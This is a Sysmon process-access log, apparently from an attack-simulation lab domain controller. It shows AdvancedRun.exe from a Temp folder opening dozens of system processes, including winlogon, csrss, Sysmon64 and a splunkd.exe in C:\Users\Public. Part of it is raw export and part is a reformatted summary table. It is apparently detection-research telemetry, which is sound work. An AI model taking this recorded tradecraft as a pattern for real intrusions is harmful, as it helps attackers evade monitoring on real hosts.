18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004011671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567 (time portion of the UtcTime field whose record header closes the preceding line; that record is the first row of the table below)

The 25 records in this span are all Sysmon Event ID 10 (ProcessAccess) entries of the same shape, so the fields they share are listed once and only the per-record fields are tabulated. Field names follow the Sysmon event-version-3 schema for Event ID 10.

Event header (identical for every record): EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000
Channel:   Microsoft-Windows-Sysmon/Operational
Computer:  win-dc-mhaag-attack-range-139.attackrange.local
RuleName:  -
UtcTime:   2022-01-21 18:44:44.567 (the same millisecond for all 25 records)

Source-side fields (identical for every record):
  SourceProcessGUID: {834264DD-FF16-61EA-CD05-000000002702}
  SourceProcessId:   5216
  SourceThreadId:    4720
  SourceImage:       C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  SourceUser:        ATTACKRANGE\Administrator
  GrantedAccess:     0x1410
  CallTrace:         C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)

Target-side fields, one row per record. EventRecordIDs descend down the list (newest first); each record's header precedes its body in the raw export, so the first row's EventRecordID sits on the line before this span.

EventRecordID              | TargetProcessGUID                      | TargetProcessId | TargetImage                                              | TargetUser
(header on preceding line) | {834264DD-DAF5-61EA-3900-000000002702} | 2664            | C:\Windows\System32\ismserv.exe                          | NT AUTHORITY\SYSTEM
4011660                    | {834264DD-DAF5-61EA-3800-000000002702} | 2272            | C:\Windows\system32\DFSRs.exe                            | NT AUTHORITY\SYSTEM
4011659                    | {834264DD-DAF5-61EA-3700-000000002702} | 1932            | C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | NT AUTHORITY\SYSTEM
4011658                    | {834264DD-DAF5-61EA-3500-000000002702} | 1832            | C:\Windows\system32\dns.exe                              | NT AUTHORITY\SYSTEM
4011657                    | {834264DD-DAF5-61EA-3400-000000002702} | 2460            | C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe         | NT AUTHORITY\SYSTEM
4011656                    | {834264DD-DAF5-61EA-3300-000000002702} | 2488            | C:\Windows\Sysmon64.exe                                  | NT AUTHORITY\SYSTEM
4011655                    | {834264DD-DAF5-61EA-3200-000000002702} | 1948            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011654                    | {834264DD-DAF5-61EA-3100-000000002702} | 660             | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\NETWORK SERVICE
4011653                    | {834264DD-DAF5-61EA-3000-000000002702} | 668             | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011652                    | {834264DD-DAF5-61EA-2F00-000000002702} | 2440            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011651                    | {834264DD-DAF4-61EA-2D00-000000002702} | 2988            | C:\Windows\System32\spoolsv.exe                          | NT AUTHORITY\SYSTEM
4011650                    | {834264DD-DAF2-61EA-2C00-000000002702} | 2896            | C:\Windows\system32\conhost.exe                          | NT AUTHORITY\SYSTEM
4011649                    | {834264DD-DAF2-61EA-2B00-000000002702} | 2888            | C:\Users\Public\splunkd.exe                              | NT AUTHORITY\SYSTEM
4011648                    | {834264DD-DAF0-61EA-2900-000000002702} | 2760            | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011647                    | {834264DD-DAE8-61EA-2000-000000002702} | 1516            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\NETWORK SERVICE
4011646                    | {834264DD-DAE7-61EA-1800-000000002702} | 1384            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\LOCAL SERVICE
4011645                    | {834264DD-DAE7-61EA-1700-000000002702} | 1300            | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011644                    | {834264DD-DAE7-61EA-1600-000000002702} | 1264            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\LOCAL SERVICE
4011643                    | {834264DD-DAE7-61EA-1500-000000002702} | 1064            | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\NETWORK SERVICE
4011642                    | {834264DD-DAE7-61EA-1400-000000002702} | 352             | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\LOCAL SERVICE
4011641                    | {834264DD-DAE7-61EA-1300-000000002702} | 832             | C:\Windows\system32\svchost.exe                          | NT AUTHORITY\LOCAL SERVICE
4011640                    | {834264DD-DAE7-61EA-1200-000000002702} | 820             | C:\Windows\system32\dwm.exe                              | Window Manager\DWM-1
4011639                    | {834264DD-DAE7-61EA-1100-000000002702} | 488             | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\SYSTEM
4011638                    | {834264DD-DAE7-61EA-1000-000000002702} | 92              | C:\Windows\System32\svchost.exe                          | NT AUTHORITY\NETWORK SERVICE
4011637                    | {834264DD-DAE7-61EA-0F00-000000002702} | 364             | C:\Windows\system32\LogonUI.exe                          | NT AUTHORITY\SYSTEM

Header of the next record (its body continues on the following line):
10341000x80000000000000004011636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
